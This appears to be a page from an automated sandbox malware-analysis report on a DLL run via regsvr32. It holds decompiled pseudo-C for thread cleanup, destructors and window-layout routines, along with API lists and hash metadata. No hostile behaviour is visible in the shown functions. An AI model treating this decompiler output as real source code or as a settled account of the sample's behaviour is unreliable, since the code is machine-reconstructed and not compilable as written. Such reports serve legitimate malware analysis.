                                                                                                                  • Part of subcall function 10042951: TlsGetValue.KERNEL32 ref: 1004295B
                                                                                                                • __freefls@4.LIBCMT ref: 10040AAF
                                                                                                                  • Part of subcall function 10042996: __decode_pointer.LIBCMT ref: 100429A4
                                                                                                                • GetLastError.KERNEL32(00000000,?,00000000,?,?), ref: 10040A81
                                                                                                                • ExitThread.KERNEL32 ref: 10040A88
                                                                                                                • GetCurrentThreadId.KERNEL32(00000000,?,00000000,?,?), ref: 10040A8E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Value$Thread__decode_pointer$CurrentErrorExitLast___set_flsgetvalue__freefls@4_doexit
                                                                                                                • String ID:
                                                                                                                • API String ID: 2731880238-0
                                                                                                                • Opcode ID: eb717d7ed8b98ed2e1f661009f5a854ab6c5a75166b4ccab585fd4c6b3f6e741
                                                                                                                • Instruction ID: afb47e32528da3674a406237c1367554b89d6b4f95c283fe5e5cabb1574ea47a
                                                                                                                • Opcode Fuzzy Hash: eb717d7ed8b98ed2e1f661009f5a854ab6c5a75166b4ccab585fd4c6b3f6e741
                                                                                                                • Instruction Fuzzy Hash: CD015E78600201AFD704EFA0C94994E7BA9EF48244F708479F905E7222D734EC52CB5A
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10013060 Relevance: 7.5, APIs: 5, Instructions: 38COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 75%
                                                                                                                			E10013060(void* __edx) {
				char _v4;
				char _v12;
				intOrPtr* _v16;
				void* __ecx;
				void* __esi;
				signed int _t16;
				signed int _t17;
				void* _t24;
				void* _t25;
				intOrPtr* _t26;
				void* _t36;
				intOrPtr* _t38;
				signed int _t40;

				_push(0xffffffff);
				_push(E10052440);
				_push( *[fs:0x0]);
				_push(_t26);
				_t16 =  *0x1006dbdc; // 0xdf7c0cda
				_t17 = _t16 ^ _t40;
				_t42 = _t17;
				_push(_t17);
				 *[fs:0x0] =  &_v12;
				_t38 = _t26;
				_v16 = _t38;
				 *_t38 = 0x1005934c;
				_v4 = 4;
				E10021AC4(_t38 + 0x1d8, _t36, _t38, _t17);
				_v4 = 3;
				E10021AC4(_t38 + 0x184, _t36, _t38, _t17);
				_v4 = 2;
				E10021AC4(_t38 + 0x130, _t36, _t38, _t42);
				_v4 = 1;
				E10021AC4(_t38 + 0xdc, _t36, _t38, _t42);
				_v4 = 0;
				E10021AC4(_t38 + 0x88, _t36, _t38, _t42);
				_v4 = 0xffffffff;
				_t24 = E1002BDE8(_t25, _t38, __edx, _t36, _t38, _t42);
				 *[fs:0x0] = _v12;
				return _t24;
			}
















                                                                                                                0x10013060
                                                                                                                0x10013062
                                                                                                                0x1001306d
                                                                                                                0x1001306e
                                                                                                                0x10013070
                                                                                                                0x10013075
                                                                                                                0x10013075
                                                                                                                0x10013077
                                                                                                                0x1001307c
                                                                                                                0x10013082
                                                                                                                0x10013084
                                                                                                                0x10013088
                                                                                                                0x10013094
                                                                                                                0x1001309c
                                                                                                                0x100130a7
                                                                                                                0x100130ac
                                                                                                                0x100130b7
                                                                                                                0x100130bc
                                                                                                                0x100130c7
                                                                                                                0x100130cc
                                                                                                                0x100130d7
                                                                                                                0x100130dc
                                                                                                                0x100130e3
                                                                                                                0x100130eb
                                                                                                                0x100130f4
                                                                                                                0x10013100

                                                                                                                APIs
                                                                                                                • ~_Task_impl.LIBCPMT ref: 1001309C
                                                                                                                  • Part of subcall function 10021AC4: __EH_prolog3.LIBCMT ref: 10021ACB
                                                                                                                • ~_Task_impl.LIBCPMT ref: 100130AC
                                                                                                                • ~_Task_impl.LIBCPMT ref: 100130BC
                                                                                                                • ~_Task_impl.LIBCPMT ref: 100130CC
                                                                                                                • ~_Task_impl.LIBCPMT ref: 100130DC
                                                                                                                  • Part of subcall function 1002BDE8: __EH_prolog3.LIBCMT ref: 1002BDEF
                                                                                                                  • Part of subcall function 1002BDE8: GlobalFree.KERNEL32(?), ref: 1002BE1E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Task_impl$H_prolog3$FreeGlobal
                                                                                                                • String ID:
                                                                                                                • API String ID: 36242457-0
                                                                                                                • Opcode ID: 6c93108f77b942b12e1f97949620aab281f2a5b73cbc7b10b2a881875f934bf7
                                                                                                                • Instruction ID: ebc56c85e892924b3cfe010b19c5d2d83d18c40ba81c3a8542310513f714a22e
                                                                                                                • Opcode Fuzzy Hash: 6c93108f77b942b12e1f97949620aab281f2a5b73cbc7b10b2a881875f934bf7
                                                                                                                • Instruction Fuzzy Hash: A8014C780097819ED315DF28E551BDABBD4EF59720F88490EE4AA532C1DB746608CBA3
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10027CA6 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 319COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 67%
                                                                                                                			E10027CA6(intOrPtr* __ecx, intOrPtr* _a4, signed int _a8, signed int _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr* _v20;
				signed int _v24;
				intOrPtr* _v28;
				signed int _v32;
				struct tagRECT _v48;
				struct tagRECT _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t181;
				intOrPtr _t182;
				intOrPtr _t185;
				signed char _t187;
				intOrPtr* _t189;
				signed char _t193;
				signed int _t196;
				intOrPtr* _t210;
				intOrPtr _t213;
				intOrPtr* _t214;
				signed int _t223;
				signed int _t230;
				intOrPtr* _t232;
				void* _t243;
				intOrPtr _t257;
				signed int _t264;
				signed int _t273;
				signed int _t276;
				signed int _t278;
				intOrPtr* _t281;
				intOrPtr _t282;
				intOrPtr* _t286;
				void* _t290;
				intOrPtr _t291;
				intOrPtr* _t293;

				_t281 = _a4;
				_push(0);
				_t232 = __ecx;
				_push(0);
				_push(0x418);
				_v8 = 0;
				 *_t281 = 0;
				 *((intOrPtr*)(_t281 + 4)) = 0;
				 *((intOrPtr*)( *__ecx + 0x110))();
				_v16 = 0;
				if(0 != 0) {
					_t276 = 0x14;
					_t277 = 0 * _t276 >> 0x20;
					_t185 = E100160BC(0,  ~0x00BADBAD | 0 * _t276);
					_t290 = 0;
					_v8 = _t185;
					if(_v16 > 0) {
						_t282 = _t185;
						do {
							E10026C61(_t232, _t290, _t282);
							_t290 = _t290 + 1;
							_t282 = _t282 + 0x14;
						} while (_t290 < _v16);
						_t291 = _v16;
						_t281 = _a4;
						_t243 = 0;
						if(_t291 > 0) {
							_t187 =  *(_t232 + 0x80);
							if((_t187 & 0x00000002) == 0) {
								_t277 = _t187 & 0x00000004;
								if((_t187 & 0x00000004) == 0) {
									L20:
									_push(_t243);
									asm("sbb eax, eax");
									_t223 =  ~(_a8 & 0x00000002) & 0x00007fff;
									__eflags = _t223;
									_push(_t223);
								} else {
									if((_a8 & 0x00000004) == 0) {
										__eflags = _a8 & 0x00000008;
										if((_a8 & 0x00000008) == 0) {
											__eflags = _a8 & 0x00000010;
											if((_a8 & 0x00000010) == 0) {
												__eflags = _a12 - 0xffffffff;
												if(_a12 == 0xffffffff) {
													__eflags = _t187 & 0x00000001;
													if((_t187 & 0x00000001) != 0) {
														goto L8;
													} else {
														goto L20;
													}
												} else {
													SetRectEmpty( &_v48);
													 *((intOrPtr*)( *_t232 + 0x140))( &_v48, _a8 & 0x00000002);
													_t230 = _a8 & 0x00000020;
													__eflags = _t230;
													if(_t230 == 0) {
														_t273 = _v48.right - _v48.left;
														__eflags = _t273;
													} else {
														_t273 = _v48.bottom - _v48.top;
													}
													_push(_t230);
													_t243 = _t273 + _a12;
													goto L13;
												}
											} else {
												_push(0);
												L13:
												_push(_t243);
											}
										} else {
											_push(0);
											_push(0x7fff);
										}
									} else {
										L8:
										_push(_t243);
										_push( *((intOrPtr*)(_t232 + 0x70)));
									}
								}
								_push(_t291);
								_push(_v8);
								E100275BC(_t232, _t277);
							}
							_t189 = E1002748D(_t232,  &(_v48.right), _v8, _t291);
							 *_t281 =  *_t189;
							 *((intOrPtr*)(_t281 + 4)) =  *((intOrPtr*)(_t189 + 4));
							if((_a8 & 0x00000040) != 0) {
								_v24 = 0;
								_a12 = 0;
								_v48.bottom =  *((intOrPtr*)(_t232 + 0xa0));
								 *((intOrPtr*)(_t232 + 0xa0)) = 0;
								if(_t291 > 0) {
									_t210 = _v8 + 4;
									_v28 = _t210;
									_t257 = _t291;
									do {
										if(( *(_t210 + 5) & 0x00000001) != 0 &&  *_t210 != 0) {
											_a12 = _a12 + 1;
										}
										_t210 = _t210 + 0x14;
										_t257 = _t257 - 1;
									} while (_t257 != 0);
									_t314 = _a12;
									if(_a12 > 0) {
										_t278 = 0x18;
										_t213 = E100160BC(_t314,  ~(0 | _t314 > 0x00000000) | _a12 * _t278);
										_t73 = _t213 + 8; // 0x8
										_t286 = _t73;
										_v24 = _t213;
										_t214 = _v28;
										_v32 = _a12;
										_t264 = 0;
										_a12 = 0;
										_v12 = 0;
										_v20 = _t286;
										_v28 = _t214;
										while(1) {
											_t277 = _v32;
											if(_a12 >= _v32) {
												break;
											}
											if(( *(_t214 + 5) & 0x00000001) != 0 &&  *_t214 != 0) {
												 *((intOrPtr*)(_t286 - 8)) = _t264;
												_t277 =  &_v64;
												 *((intOrPtr*)(_t286 - 4)) =  *_t214;
												 *((intOrPtr*)( *_t232 + 0x170))(_t264,  &_v64);
												E100242B0(_t232,  &_v64);
												_a12 = _a12 + 1;
												_v20 = _v20 + 0x18;
												_t264 = _v12;
												_t214 = _v28;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t286 = _v20;
											}
											_t264 = _t264 + 1;
											_t214 = _t214 + 0x14;
											_v12 = _t264;
											_v28 = _t214;
											if(_t264 < _v16) {
												continue;
											}
											break;
										}
										_t291 = _v16;
										_t281 = _a4;
									}
								}
								_t193 =  *(_t232 + 0x80);
								if((_t193 & 0x00000001) != 0 && (_t193 & 0x00000004) != 0) {
									 *((intOrPtr*)(_t232 + 0x70)) =  *_t281;
								}
								_v12 = _v12 & 0x00000000;
								_t323 = _t291;
								if(_t291 > 0) {
									_v20 = _v8;
									do {
										E1002728F(_t232, _t277, _t323, _v12, _v20);
										_v12 = _v12 + 1;
										_v20 = _v20 + 0x14;
									} while (_v12 < _t291);
								}
								if(_a12 > 0) {
									_t293 = _v24 + 8;
									_v20 = _t293;
									do {
										_t196 = E1001D1C2(_t232,  *((intOrPtr*)(_t293 - 4)));
										_v32 = _t196;
										if(_t196 != 0) {
											GetWindowRect( *(_t196 + 0x20),  &_v64);
											 *((intOrPtr*)( *_t232 + 0x170))( *((intOrPtr*)(_v20 - 8)),  &_v64);
											E1001D569(_v32, 0, _v64.left -  *_t293 + _v64.left, _v64.top -  *((intOrPtr*)(_t293 + 4)) + _v64.top, 0, 0, 0x15);
											_t293 = _v20;
											_t281 = _a4;
										}
										_t293 = _t293 + 0x18;
										_t142 =  &_a12;
										 *_t142 = _a12 - 1;
										_t329 =  *_t142;
										_v20 = _t293;
									} while ( *_t142 != 0);
									_push(_v24);
									E100160E7(_t232, _t281, _t293, _t329);
								}
								 *((intOrPtr*)(_t232 + 0xa0)) = _v48.bottom;
							}
							_push(_v8);
							E100160E7(_t232, _t281, _t291, _t329);
						}
					}
				}
				SetRectEmpty( &_v64);
				 *((intOrPtr*)( *_t232 + 0x140))( &_v64, _a8 & 0x00000002);
				 *((intOrPtr*)(_t281 + 4)) =  *((intOrPtr*)(_t281 + 4)) + _v64.top - _v64.bottom;
				 *_t281 =  *_t281 + _v64.left - _v64.right;
				E10035EB3( &(_v48.right), _a8 & 0x00000001, _a8 & 0x00000002);
				_t181 =  *_t281;
				if(_t181 <= _v48.right) {
					_t181 = _v48.right;
				}
				 *_t281 = _t181;
				_t182 =  *((intOrPtr*)(_t281 + 4));
				if(_t182 <= _v48.bottom) {
					_t182 = _v48.bottom;
				}
				 *((intOrPtr*)(_t281 + 4)) = _t182;
				return _t281;
			}









































                                                                                                                0x10027cb1
                                                                                                                0x10027cb4
                                                                                                                0x10027cb5
                                                                                                                0x10027cb9
                                                                                                                0x10027cba
                                                                                                                0x10027cbf
                                                                                                                0x10027cc2
                                                                                                                0x10027cc4
                                                                                                                0x10027cc7
                                                                                                                0x10027cd3
                                                                                                                0x10027cd6
                                                                                                                0x10027cde
                                                                                                                0x10027cdf
                                                                                                                0x10027ce9
                                                                                                                0x10027cee
                                                                                                                0x10027cf4
                                                                                                                0x10027cf7
                                                                                                                0x10027cfd
                                                                                                                0x10027cff
                                                                                                                0x10027d03
                                                                                                                0x10027d08
                                                                                                                0x10027d09
                                                                                                                0x10027d0c
                                                                                                                0x10027d11
                                                                                                                0x10027d14
                                                                                                                0x10027d17
                                                                                                                0x10027d1b
                                                                                                                0x10027d21
                                                                                                                0x10027d29
                                                                                                                0x10027d31
                                                                                                                0x10027d34
                                                                                                                0x10027da1
                                                                                                                0x10027da8
                                                                                                                0x10027da9
                                                                                                                0x10027dab
                                                                                                                0x10027dab
                                                                                                                0x10027db0
                                                                                                                0x10027d36
                                                                                                                0x10027d3a
                                                                                                                0x10027d42
                                                                                                                0x10027d46
                                                                                                                0x10027d50
                                                                                                                0x10027d54
                                                                                                                0x10027d5a
                                                                                                                0x10027d5e
                                                                                                                0x10027d9d
                                                                                                                0x10027d9f
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10027d60
                                                                                                                0x10027d64
                                                                                                                0x10027d79
                                                                                                                0x10027d82
                                                                                                                0x10027d82
                                                                                                                0x10027d85
                                                                                                                0x10027d92
                                                                                                                0x10027d92
                                                                                                                0x10027d87
                                                                                                                0x10027d8a
                                                                                                                0x10027d8a
                                                                                                                0x10027d95
                                                                                                                0x10027d99
                                                                                                                0x00000000
                                                                                                                0x10027d99
                                                                                                                0x10027d56
                                                                                                                0x10027d56
                                                                                                                0x10027d57
                                                                                                                0x10027d57
                                                                                                                0x10027d57
                                                                                                                0x10027d48
                                                                                                                0x10027d48
                                                                                                                0x10027d49
                                                                                                                0x10027d49
                                                                                                                0x10027d3c
                                                                                                                0x10027d3c
                                                                                                                0x10027d3c
                                                                                                                0x10027d3d
                                                                                                                0x10027d3d
                                                                                                                0x10027d3a
                                                                                                                0x10027db1
                                                                                                                0x10027db2
                                                                                                                0x10027db7
                                                                                                                0x10027db7
                                                                                                                0x10027dc6
                                                                                                                0x10027dd4
                                                                                                                0x10027dd6
                                                                                                                0x10027dd9
                                                                                                                0x10027de9
                                                                                                                0x10027dec
                                                                                                                0x10027def
                                                                                                                0x10027df2
                                                                                                                0x10027df8
                                                                                                                0x10027e01
                                                                                                                0x10027e04
                                                                                                                0x10027e07
                                                                                                                0x10027e09
                                                                                                                0x10027e0d
                                                                                                                0x10027e14
                                                                                                                0x10027e14
                                                                                                                0x10027e17
                                                                                                                0x10027e1a
                                                                                                                0x10027e1a
                                                                                                                0x10027e1d
                                                                                                                0x10027e21
                                                                                                                0x10027e2e
                                                                                                                0x10027e39
                                                                                                                0x10027e42
                                                                                                                0x10027e42
                                                                                                                0x10027e45
                                                                                                                0x10027e48
                                                                                                                0x10027e4b
                                                                                                                0x10027e4e
                                                                                                                0x10027e50
                                                                                                                0x10027e53
                                                                                                                0x10027e56
                                                                                                                0x10027e59
                                                                                                                0x10027e5c
                                                                                                                0x10027e5c
                                                                                                                0x10027e62
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10027e68
                                                                                                                0x10027e6f
                                                                                                                0x10027e74
                                                                                                                0x10027e78
                                                                                                                0x10027e80
                                                                                                                0x10027e8c
                                                                                                                0x10027e91
                                                                                                                0x10027e94
                                                                                                                0x10027e98
                                                                                                                0x10027e9b
                                                                                                                0x10027ea1
                                                                                                                0x10027ea2
                                                                                                                0x10027ea3
                                                                                                                0x10027ea4
                                                                                                                0x10027ea5
                                                                                                                0x10027ea5
                                                                                                                0x10027ea8
                                                                                                                0x10027ea9
                                                                                                                0x10027eaf
                                                                                                                0x10027eb2
                                                                                                                0x10027eb5
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10027eb5
                                                                                                                0x10027eb7
                                                                                                                0x10027eba
                                                                                                                0x10027eba
                                                                                                                0x10027e21
                                                                                                                0x10027ebd
                                                                                                                0x10027ec5
                                                                                                                0x10027ecd
                                                                                                                0x10027ecd
                                                                                                                0x10027ed0
                                                                                                                0x10027ed4
                                                                                                                0x10027ed6
                                                                                                                0x10027edb
                                                                                                                0x10027ede
                                                                                                                0x10027ee6
                                                                                                                0x10027eeb
                                                                                                                0x10027eee
                                                                                                                0x10027ef2
                                                                                                                0x10027ede
                                                                                                                0x10027efb
                                                                                                                0x10027f07
                                                                                                                0x10027f0a
                                                                                                                0x10027f10
                                                                                                                0x10027f15
                                                                                                                0x10027f1c
                                                                                                                0x10027f1f
                                                                                                                0x10027f28
                                                                                                                0x10027f4b
                                                                                                                0x10027f67
                                                                                                                0x10027f6c
                                                                                                                0x10027f6f
                                                                                                                0x10027f6f
                                                                                                                0x10027f72
                                                                                                                0x10027f75
                                                                                                                0x10027f75
                                                                                                                0x10027f75
                                                                                                                0x10027f78
                                                                                                                0x10027f78
                                                                                                                0x10027f7d
                                                                                                                0x10027f80
                                                                                                                0x10027f85
                                                                                                                0x10027f89
                                                                                                                0x10027f89
                                                                                                                0x10027f8f
                                                                                                                0x10027f92
                                                                                                                0x10027f97
                                                                                                                0x10027d1b
                                                                                                                0x10027cf7
                                                                                                                0x10027f9c
                                                                                                                0x10027fb1
                                                                                                                0x10027fbe
                                                                                                                0x10027fc9
                                                                                                                0x10027fd6
                                                                                                                0x10027fdb
                                                                                                                0x10027fe0
                                                                                                                0x10027fe2
                                                                                                                0x10027fe2
                                                                                                                0x10027fe5
                                                                                                                0x10027fe7
                                                                                                                0x10027fed
                                                                                                                0x10027fef
                                                                                                                0x10027fef
                                                                                                                0x10027ff2
                                                                                                                0x10027ffb

                                                                                                                APIs
                                                                                                                • SetRectEmpty.USER32(?), ref: 10027F9C
                                                                                                                  • Part of subcall function 100160BC: _malloc.LIBCMT ref: 100160D6
                                                                                                                • GetWindowRect.USER32 ref: 10027F28
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Rect$EmptyWindow_malloc
                                                                                                                • String ID: @
                                                                                                                • API String ID: 299164714-2766056989
                                                                                                                • Opcode ID: dae3294daa8c9a27f67f55fe1ffbde352a8a01721e2bb9760a289b61ed372211
                                                                                                                • Instruction ID: 0bb9f53d18901d768b51ae1a01fbd580b0b2000f8dfcbda62b694dd3f404dfc4
                                                                                                                • Opcode Fuzzy Hash: dae3294daa8c9a27f67f55fe1ffbde352a8a01721e2bb9760a289b61ed372211
                                                                                                                • Instruction Fuzzy Hash: A9C13C71900219AFCF45CFA8D885AEEBBF5FF08344F518569F81AAB251D734AD40CBA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10014760 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 154windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 86%
                                                                                                                			E10014760(intOrPtr* __ecx, void* __edx, void* __ebp, void* __eflags) {
				char _v12;
				intOrPtr _v56;
				intOrPtr _v64;
				int _v76;
				char _v84;
				char _v88;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				char _v124;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				char _v148;
				char _v164;
				char _v168;
				intOrPtr _v172;
				char _v180;
				char _v188;
				char _v200;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t51;
				struct tagRECT* _t55;
				intOrPtr _t63;
				void* _t67;
				long _t69;
				intOrPtr _t121;
				struct tagRECT* _t123;
				intOrPtr* _t128;
				void* _t131;
				void* _t135;

				_t135 = __eflags;
				_push(0xffffffff);
				_push(E100527C0);
				_push( *[fs:0x0]);
				_t51 =  *0x1006dbdc; // 0xdf7c0cda
				_push(_t51 ^ _t131 - 0x0000006c);
				 *[fs:0x0] =  &_v12;
				_t128 = __ecx;
				_v120 = E1002B6AB(__ecx, __edx);
				_t55 = E100160BC(_t135, 0x10);
				_t136 = _t55;
				if(_t55 == 0) {
					_t123 = 0;
					__eflags = 0;
				} else {
					_t55->left = 0;
					_t55->top = 0;
					_t55->right = 0;
					_t55->bottom = 0;
					_t123 = _t55;
				}
				GetWindowRect( *(_t128 + 0x20), _t123);
				E1001D569(_t128, _t128, _t123->left, _t123->top, _t123->right - _t123->left, _t123->bottom - _t123->top + 0x23, 4);
				_v124 = 0x46;
				_v120 = 0x10e;
				_v116 = 0x8c;
				_v112 = 0x12c;
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t128 + 0x100)) + 0x134))))(0x10059a90, 0x50000000,  &_v124, _t128, 0x640);
				E1001D35E(_t128 + 0x100, 5);
				_t63 =  *((intOrPtr*)(_t128 + 0xac));
				_t119 =  *((intOrPtr*)(_t63 + 0x134));
				_t125 = _t128 + 0xac;
				_v148 = 0xd7;
				_v144 = 0x10e;
				_v140 = 0x11d;
				_v136 = 0x12c;
				 *((intOrPtr*)( *((intOrPtr*)(_t63 + 0x134))))(0x10059a88, 0x50000000,  &_v148, _t128, 0x641);
				E1001D35E(_t128 + 0xac, 5);
				E100205E2( &_v188, _t136);
				_push(0);
				_push(0);
				_push("Setting\\Setting.dat");
				_v76 = 0;
				_t67 = E10020A24( &_v188,  *((intOrPtr*)(_t63 + 0x134)), _t136);
				_t137 = _t67;
				if(_t67 != 0) {
					 *((intOrPtr*)( *((intOrPtr*)(_v168 + 0x28))))(0, 0, 0);
					E10020058(0,  &_v148,  *((intOrPtr*)(_v168 + 0x28)), _t125, _t128, _t137);
					_t121 =  *_t128;
					_t119 =  *((intOrPtr*)(_t121 + 8));
					_v84 = 1;
					 *((intOrPtr*)( *((intOrPtr*)(_t121 + 8))))( &_v164,  &_v180, 1, 0x1000, 0);
					E1001FEB3( &_v168, _t137);
					E10020580(0,  &_v200);
					_v88 = 0;
					E1002001A(0,  &_v168,  *((intOrPtr*)(_t121 + 8)), _t125, _t128, _t137);
				}
				_t69 = SendMessageA( *(_t128 + 0x34c), 0xf0, 0, 0);
				_t138 = _t69;
				if(_t69 == 0) {
					E1001D39A(_t128 + 0x2d8, 0);
					E1001D39A(_t128 + 0x284, 0);
					E1001D39A(_t128 + 0x230, 0);
					E1001D39A(_t128 + 0x1dc, 0);
				}
				_v56 = 0xffffffff;
				E100206EF(0,  &_v168, _t119, _t125, _t128, _t138);
				 *[fs:0x0] = _v64;
				return _v172;
			}




































                                                                                                                0x10014760
                                                                                                                0x10014760
                                                                                                                0x10014762
                                                                                                                0x1001476d
                                                                                                                0x10014774
                                                                                                                0x1001477b
                                                                                                                0x10014780
                                                                                                                0x10014786
                                                                                                                0x1001478f
                                                                                                                0x10014793
                                                                                                                0x1001479d
                                                                                                                0x1001479f
                                                                                                                0x100147b0
                                                                                                                0x100147b0
                                                                                                                0x100147a1
                                                                                                                0x100147a1
                                                                                                                0x100147a3
                                                                                                                0x100147a6
                                                                                                                0x100147a9
                                                                                                                0x100147ac
                                                                                                                0x100147ac
                                                                                                                0x100147b7
                                                                                                                0x100147d8
                                                                                                                0x10014806
                                                                                                                0x1001480e
                                                                                                                0x10014816
                                                                                                                0x1001481e
                                                                                                                0x10014826
                                                                                                                0x1001482c
                                                                                                                0x10014831
                                                                                                                0x10014837
                                                                                                                0x10014848
                                                                                                                0x1001485a
                                                                                                                0x10014862
                                                                                                                0x1001486a
                                                                                                                0x10014872
                                                                                                                0x1001487a
                                                                                                                0x10014880
                                                                                                                0x10014889
                                                                                                                0x1001488e
                                                                                                                0x1001488f
                                                                                                                0x10014890
                                                                                                                0x10014899
                                                                                                                0x100148a0
                                                                                                                0x100148a5
                                                                                                                0x100148a7
                                                                                                                0x100148b7
                                                                                                                0x100148ca
                                                                                                                0x100148cf
                                                                                                                0x100148d1
                                                                                                                0x100148db
                                                                                                                0x100148e3
                                                                                                                0x100148e9
                                                                                                                0x100148f2
                                                                                                                0x100148fb
                                                                                                                0x10014902
                                                                                                                0x10014902
                                                                                                                0x10014915
                                                                                                                0x1001491b
                                                                                                                0x1001491d
                                                                                                                0x10014926
                                                                                                                0x10014932
                                                                                                                0x1001493e
                                                                                                                0x1001494a
                                                                                                                0x1001494a
                                                                                                                0x10014953
                                                                                                                0x1001495e
                                                                                                                0x1001496b
                                                                                                                0x10014979

                                                                                                                APIs
                                                                                                                  • Part of subcall function 1002B6AB: GetDlgItem.USER32(?,00003020), ref: 1002B6C7
                                                                                                                  • Part of subcall function 1002B6AB: GetDlgItem.USER32(?,00003020), ref: 1002B6FA
                                                                                                                  • Part of subcall function 1002B6AB: GetWindowRect.USER32 ref: 1002B708
                                                                                                                  • Part of subcall function 1002B6AB: MapDialogRect.USER32(?,?), ref: 1002B72C
                                                                                                                  • Part of subcall function 1002B6AB: SetWindowPos.USER32(?,00000000,00000000,00000000,?,00000020,00000016), ref: 1002B759
                                                                                                                  • Part of subcall function 1002B6AB: GetDlgItem.USER32(00000020,?), ref: 1002B76E
                                                                                                                  • Part of subcall function 1002B6AB: GetWindowRect.USER32 ref: 1002B780
                                                                                                                  • Part of subcall function 1002B6AB: SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,00000015), ref: 1002B79F
                                                                                                                  • Part of subcall function 1002B6AB: GetWindowRect.USER32 ref: 1002B7B6
                                                                                                                  • Part of subcall function 100160BC: _malloc.LIBCMT ref: 100160D6
                                                                                                                • GetWindowRect.USER32 ref: 100147B7
                                                                                                                • SendMessageA.USER32 ref: 10014915
                                                                                                                  • Part of subcall function 1001D39A: EnableWindow.USER32(?,00000000), ref: 1001D3A7
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$Rect$Item$DialogEnableMessageSend_malloc
                                                                                                                • String ID: F$Setting\Setting.dat
                                                                                                                • API String ID: 3745574929-3159128719
                                                                                                                • Opcode ID: 3feb124d148249ab2c5fe1efdd928a0f3a06b07ab819245acb09f0f247ffbf0e
                                                                                                                • Instruction ID: d869e2a3a323fed655b272c0ba8c281d00e5f99fba5fe1ed867fa744839d8717
                                                                                                                • Opcode Fuzzy Hash: 3feb124d148249ab2c5fe1efdd928a0f3a06b07ab819245acb09f0f247ffbf0e
                                                                                                                • Instruction Fuzzy Hash: 415159B5104340AFD314DF24CC85FABB7E9EF88700F40891DF59A97291DB74A948CB62
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10015A85 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
